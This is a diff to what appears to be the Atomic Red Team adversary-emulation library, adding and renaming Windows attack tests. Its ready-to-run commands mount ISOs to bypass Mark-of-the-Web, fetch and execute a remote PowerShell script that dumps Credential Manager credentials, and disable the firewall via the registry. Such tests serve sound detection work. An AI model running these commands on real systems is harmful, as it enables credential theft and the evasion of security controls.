-Open a .docx file that loads a remote .dotm macro enabled template. Executes the code specified within the .dotm template.Requires download of WINWORD found in Microsoft Ofiice at Microsoft: https://www.microsoft.com/en-us/download/office.aspx.  Opens Calculator.exe when test sucessfully executed, while AV turned off.
+Open a .docx file that loads a remote .dotm macro enabled template from https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1221/src/opencalc.dotm 
+Executes the code specified within the .dotm template.
+Requires download of WINWORD found in Microsoft Ofiice at Microsoft: https://www.microsoft.com/en-us/download/office.aspx.  
+Default docs file opens Calculator.exe when test sucessfully executed, while AV turned off.

 **Supported Platforms:** Windows

@@ -26,15 +29,14 @@ Open a .docx file that loads a remote .dotm macro enabled template. Executes the
 #### Inputs:
 | Name | Description | Type | Default Value | 
 |------|-------------|------|---------------|
-| docx file | Location of the test docx file on the local filesystem. | Path | PathToAtomicsFolder&#92;T1221&#92;src&#92;Calculator.docx|
-| dotm template | Location of the test dotm template on the remote server. | Path | https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1221/src/opencalc.dotm|
+| docx_file | Location of the test docx file on the local filesystem. | Path | PathToAtomicsFolder&#92;T1221&#92;src&#92;Calculator.docx|


 #### Attack Commands: Run with `command_prompt`! 


 ```cmd
-start PathToAtomicsFolder\T1221\src\Calculator.docx
+start #{docx_file}
 ```


@@ -4,18 +4,17 @@ atomic_tests:
 - name: WINWORD Remote Template Injection
  auto_generated_guid: 1489e08a-82c7-44ee-b769-51b72d03521d
  description: |
-    Open a .docx file that loads a remote .dotm macro enabled template. Executes the code specified within the .dotm template.Requires download of WINWORD found in Microsoft Ofiice at Microsoft: https://www.microsoft.com/en-us/download/office.aspx.  Opens Calculator.exe when test sucessfully executed, while AV turned off.
+    Open a .docx file that loads a remote .dotm macro enabled template from https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1221/src/opencalc.dotm 
+    Executes the code specified within the .dotm template.
+    Requires download of WINWORD found in Microsoft Ofiice at Microsoft: https://www.microsoft.com/en-us/download/office.aspx.  
+    Default docs file opens Calculator.exe when test sucessfully executed, while AV turned off.
  supported_platforms:
  - windows
  input_arguments:
-    docx file:
+    docx_file:
      description: Location of the test docx file on the local filesystem.
      type: Path
      default: PathToAtomicsFolder\T1221\src\Calculator.docx
-    dotm template:
-      description: Location of the test dotm template on the remote server.
-      type: Path
-      default: https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1221/src/opencalc.dotm
  dependency_executor_name: powershell
  dependencies:
  - description: |
@@ -23,5 +22,5 @@ atomic_tests:
    get_prereq_command: |
  executor:
    command: |
-      start PathToAtomicsFolder\T1221\src\Calculator.docx
+      start #{docx_file}
    name: command_prompt
@@ -0,0 +1,110 @@
+# T1553.005 - Mark-of-the-Web Bypass
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1553/005)
+<blockquote>Adversaries may abuse specific file formats to subvert Mark-of-the-Web (MOTW) controls. In Windows, when files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named <code>Zone.Identifier</code> with a specific value known as the MOTW.(Citation: Microsoft Zone.Identifier 2020) Files that are tagged with MOTW are protected and cannot perform certain actions. For example, starting in MS Office 10, if a MS Office file has the MOTW, it will open in Protected View. Executables tagged with the MOTW will be processed by Windows Defender SmartScreen that compares files with an allowlist of well-known executables. If the file in not known/trusted, SmartScreen will prevent the execution and warn the user not to run it.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)(Citation: Intezer Russian APT Dec 2020)
+
+Adversaries may abuse container files such as compressed/archive (.arj, .gzip) and/or disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW. Container files downloaded from the Internet will be marked with MOTW but the files within may not inherit the MOTW after the container files are extracted and/or mounted. MOTW is a NTFS feature and many container files do not support NTFS alternative data streams. After a container file is extracted and/or mounted, the files contained within them may be treated as local files on disk and run without protections.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Mount ISO image](#atomic-test-1---mount-iso-image)
+
+- [Atomic Test #2 - Mount an ISO image and run executable from the ISO](#atomic-test-2---mount-an-iso-image-and-run-executable-from-the-iso)
+
+
+<br/>
+
+## Atomic Test #1 - Mount ISO image
+Mounts ISO image downloaded from internet to evade Mark-of-the-Web. Upon successful execution, powershell will download the .iso from the Atomic Red Team repo, and mount the image. The provided sample ISO simply has a Reports shortcut file in it. Reference: https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| path_of_iso | Path to ISO file | path | PathToAtomicsFolder&#92;T1553.005&#92;bin&#92;T1553.005.iso|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Mount-DiskImage -ImagePath "#{path_of_iso}"
+```
+
+#### Cleanup Commands:
+```powershell
+Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: T1553.005.iso must exist on disk at specified location (#{path_of_iso})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{path_of_iso}) {exit 0} else {exit 1} 
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null
+Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/T1553.005.iso -OutFile "#{path_of_iso}"
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #2 - Mount an ISO image and run executable from the ISO
+Mounts an ISO image downloaded from internet to evade Mark-of-the-Web and run hello.exe executable from the ISO. 
+Upon successful execution, powershell will download the .iso from the Atomic Red Team repo, mount the image, and run the executable from the ISO image that will open command prompt echoing "Hello, World!". 
+ISO provided by:https://twitter.com/mattifestation/status/1398323532988399620 Reference:https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/,
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| path_of_iso | Path to ISO file | path | PathToAtomicsFolder&#92;T1553.005&#92;bin&#92;FeelTheBurn.iso|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$keep = Mount-DiskImage -ImagePath "#{path_of_iso}" -StorageType ISO -Access ReadOnly
+$driveLetter = ($keep | Get-Volume).DriveLetter
+invoke-item "$($driveLetter):\hello.exe"
+```
+
+#### Cleanup Commands:
+```powershell
+Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null
+Stop-process -name "hello" -Force -ErrorAction ignore
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: FeelTheBurn.iso must exist on disk at specified location (#{path_of_iso})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{path_of_iso}) {exit 0} else {exit 1} 
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null
+Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/FeelTheBurn.iso -OutFile "#{path_of_iso}"
+```
+
+
+
+
+<br/>
@@ -0,0 +1,61 @@
+attack_technique: T1553.005
+display_name: 'Subvert Trust Controls: Mark-of-the-Web Bypass'
+atomic_tests:
+- name: Mount ISO image
+  auto_generated_guid: 002cca30-4778-4891-878a-aaffcfa502fa
+  description: |
+    Mounts ISO image downloaded from internet to evade Mark-of-the-Web. Upon successful execution, powershell will download the .iso from the Atomic Red Team repo, and mount the image. The provided sample ISO simply has a Reports shortcut file in it. Reference: https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/
+  supported_platforms:
+  - windows
+  input_arguments:
+    path_of_iso:
+      description: Path to ISO file
+      type: path
+      default: PathToAtomicsFolder\T1553.005\bin\T1553.005.iso
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      T1553.005.iso must exist on disk at specified location (#{path_of_iso})
+    prereq_command: |
+      if (Test-Path #{path_of_iso}) {exit 0} else {exit 1}
+    get_prereq_command: |
+      New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null
+      Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/T1553.005.iso -OutFile "#{path_of_iso}"
+  executor:
+    command: |
+      Mount-DiskImage -ImagePath "#{path_of_iso}"
+    cleanup_command: |
+      Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null
+    name: powershell
+
+- name: Mount an ISO image and run executable from the ISO
+  auto_generated_guid: 42f22b00-0242-4afc-a61b-0da05041f9cc
+  description: |-
+    Mounts an ISO image downloaded from internet to evade Mark-of-the-Web and run hello.exe executable from the ISO. 
+    Upon successful execution, powershell will download the .iso from the Atomic Red Team repo, mount the image, and run the executable from the ISO image that will open command prompt echoing "Hello, World!". 
+    ISO provided by:https://twitter.com/mattifestation/status/1398323532988399620 Reference:https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/,  
+  supported_platforms:
+  - windows
+  input_arguments:
+    path_of_iso:
+      description: Path to ISO file
+      type: path
+      default: PathToAtomicsFolder\T1553.005\bin\FeelTheBurn.iso
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      FeelTheBurn.iso must exist on disk at specified location (#{path_of_iso})
+    prereq_command: |
+      if (Test-Path #{path_of_iso}) {exit 0} else {exit 1}
+    get_prereq_command: |
+      New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null
+      Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/FeelTheBurn.iso -OutFile "#{path_of_iso}"
+  executor:
+    command: |
+      $keep = Mount-DiskImage -ImagePath "#{path_of_iso}" -StorageType ISO -Access ReadOnly
+      $driveLetter = ($keep | Get-Volume).DriveLetter
+      invoke-item "$($driveLetter):\hello.exe"
+    cleanup_command: |
+      Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null
+      Stop-process -name "hello" -Force -ErrorAction ignore
+    name: powershell
@@ -6,6 +6,10 @@

 - [Atomic Test #1 - Extract Windows Credential Manager via VBA](#atomic-test-1---extract-windows-credential-manager-via-vba)

+- [Atomic Test #2 - Dump credentials from Windows Credential Manager With PowerShell [windows Credentials]](#atomic-test-2---dump-credentials-from-windows-credential-manager-with-powershell-windows-credentials)
+
+- [Atomic Test #3 - Dump credentials from Windows Credential Manager With PowerShell [web Credentials]](#atomic-test-3---dump-credentials-from-windows-credential-manager-with-powershell-web-credentials)
+

 <br/>

@@ -53,4 +57,52 @@ Write-Host "You will need to install Microsoft Word manually to meet this requir



+<br/>
+<br/>
+
+## Atomic Test #2 - Dump credentials from Windows Credential Manager With PowerShell [windows Credentials]
+This module will extract the credentials from Windows Credential Manager
+
+**Supported Platforms:** Windows
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-PasswordVaultCredentials -Force
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #3 - Dump credentials from Windows Credential Manager With PowerShell [web Credentials]
+This module will extract the credentials from Windows Credential Manager
+
+**Supported Platforms:** Windows
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-CredManCreds -Force
+```
+
+
+
+
+
+
 <br/>
@@ -28,3 +28,23 @@ atomic_tests:
    cleanup_command: |
      Remove-Item "$env:TEMP\windows-credentials.txt" -ErrorAction Ignore
    name: powershell
+- name: Dump credentials from Windows Credential Manager With PowerShell [windows Credentials]
+  auto_generated_guid: c89becbe-1758-4e7d-a0f4-97d2188a23e3
+  description: This module will extract the credentials from Windows Credential Manager
+  supported_platforms:
+  - windows
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-PasswordVaultCredentials -Force   
+- name: Dump credentials from Windows Credential Manager With PowerShell [web Credentials]
+  auto_generated_guid: 8fd5a296-6772-4766-9991-ff4e92af7240
+  description: This module will extract the credentials from Windows Credential Manager
+  supported_platforms:
+  - windows
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-CredManCreds -Force
@@ -10,13 +10,15 @@ Modifying or disabling a system firewall may enable adversary C2 communications,

 - [Atomic Test #2 - Disable Microsoft Defender Firewall](#atomic-test-2---disable-microsoft-defender-firewall)

- [Atomic Test #3 - Allow SMB and RDP on Microsoft Defender Firewall](#atomic-test-3---allow-smb-and-rdp-on-microsoft-defender-firewall)
+- [Atomic Test #3 - Disable Microsoft Defender Firewall via Registry](#atomic-test-3---disable-microsoft-defender-firewall-via-registry)

- [Atomic Test #4 - Opening ports for proxy - HARDRAIN](#atomic-test-4---opening-ports-for-proxy---hardrain)
+- [Atomic Test #4 - Allow SMB and RDP on Microsoft Defender Firewall](#atomic-test-4---allow-smb-and-rdp-on-microsoft-defender-firewall)

- [Atomic Test #5 - Open a local port through Windows Firewall to any profile](#atomic-test-5---open-a-local-port-through-windows-firewall-to-any-profile)
+- [Atomic Test #5 - Opening ports for proxy - HARDRAIN](#atomic-test-5---opening-ports-for-proxy---hardrain)

- [Atomic Test #6 - Allow Executable Through Firewall Located in Non-Standard Location](#atomic-test-6---allow-executable-through-firewall-located-in-non-standard-location)
+- [Atomic Test #6 - Open a local port through Windows Firewall to any profile](#atomic-test-6---open-a-local-port-through-windows-firewall-to-any-profile)
+
+- [Atomic Test #7 - Allow Executable Through Firewall Located in Non-Standard Location](#atomic-test-7---allow-executable-through-firewall-located-in-non-standard-location)


 <br/>
@@ -84,7 +86,36 @@ netsh advfirewall set currentprofile state on >nul 2>&1
 <br/>
 <br/>

-## Atomic Test #3 - Allow SMB and RDP on Microsoft Defender Firewall
+## Atomic Test #3 - Disable Microsoft Defender Firewall via Registry
+Disables the Microsoft Defender Firewall for the public profile via registry
+Caution if you access remotely the host where the test runs! Especially with the cleanup command which will re-enable firewall for the current profile...
+
+**Supported Platforms:** Windows
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile" /v "EnableFirewall" /t REG_DWORD /d 0 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile" /v "EnableFirewall" /t REG_DWORD /d 1 /f
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #4 - Allow SMB and RDP on Microsoft Defender Firewall
 Allow all SMB and RDP rules on the Microsoft Defender Firewall for all profiles.
 Caution if you access remotely the host where the test runs! Especially with the cleanup command which will reset the firewall and risk disabling those services...

@@ -114,7 +145,7 @@ netsh advfirewall reset >nul 2>&1
 <br/>
 <br/>

-## Atomic Test #4 - Opening ports for proxy - HARDRAIN
+## Atomic Test #5 - Opening ports for proxy - HARDRAIN
 This test creates a listening interface on a victim device. This tactic was used by HARDRAIN for proxying.

 reference: https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-F.pdf
@@ -144,7 +175,7 @@ netsh advfirewall firewall delete rule name="atomic testing" protocol=TCP localp
 <br/>
 <br/>

-## Atomic Test #5 - Open a local port through Windows Firewall to any profile
+## Atomic Test #6 - Open a local port through Windows Firewall to any profile
 This test will attempt to open a local port defined by input arguments to any profile

 **Supported Platforms:** Windows
@@ -177,7 +208,7 @@ netsh advfirewall firewall delete rule name="Open Port to Any" | Out-Null
 <br/>
 <br/>

-## Atomic Test #6 - Allow Executable Through Firewall Located in Non-Standard Location
+## Atomic Test #7 - Allow Executable Through Firewall Located in Non-Standard Location
 This test will attempt to allow an executable through the system firewall located in the Users directory

 **Supported Platforms:** Windows
@@ -36,6 +36,19 @@ atomic_tests:
    cleanup_command: |
      netsh advfirewall set currentprofile state on >nul 2>&1
    name: command_prompt
+- name: Disable Microsoft Defender Firewall via Registry
+  auto_generated_guid: afedc8c4-038c-4d82-b3e5-623a95f8a612
+  description: |
+    Disables the Microsoft Defender Firewall for the public profile via registry
+    Caution if you access remotely the host where the test runs! Especially with the cleanup command which will re-enable firewall for the current profile...
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile" /v "EnableFirewall" /t REG_DWORD /d 0 /f
+    cleanup_command: |
+      reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile" /v "EnableFirewall" /t REG_DWORD /d 1 /f
+    name: command_prompt
 - name: Allow SMB and RDP on Microsoft Defender Firewall
  auto_generated_guid: d9841bf8-f161-4c73-81e9-fd773a5ff8c1
  description: |
@@ -710,3 +710,13 @@ c33f3d80-5f04-419b-a13a-854d1cbdbf3a
 126f71af-e1c9-405c-94ef-26a47b16c102
 da4f751a-020b-40d7-b9ff-d433b7799803
 c35ac4a8-19de-43af-b9f8-755da7e89c89
+002cca30-4778-4891-878a-aaffcfa502fa
+42f22b00-0242-4afc-a61b-0da05041f9cc
+c89becbe-1758-4e7d-a0f4-97d2188a23e3
+8fd5a296-6772-4766-9991-ff4e92af7240
+7e91138a-8e74-456d-a007-973d67a0bb80
+437b2003-a20d-4ed8-834c-4964f24eec63
+4f08197a-2a8a-472d-9589-cd2895ef22ad
+d546a3d9-0be5-40c7-ad82-5a7d79e1b66b
+812c3ab8-94b0-4698-a9bf-9420af23ce24
+afedc8c4-038c-4d82-b3e5-623a95f8a612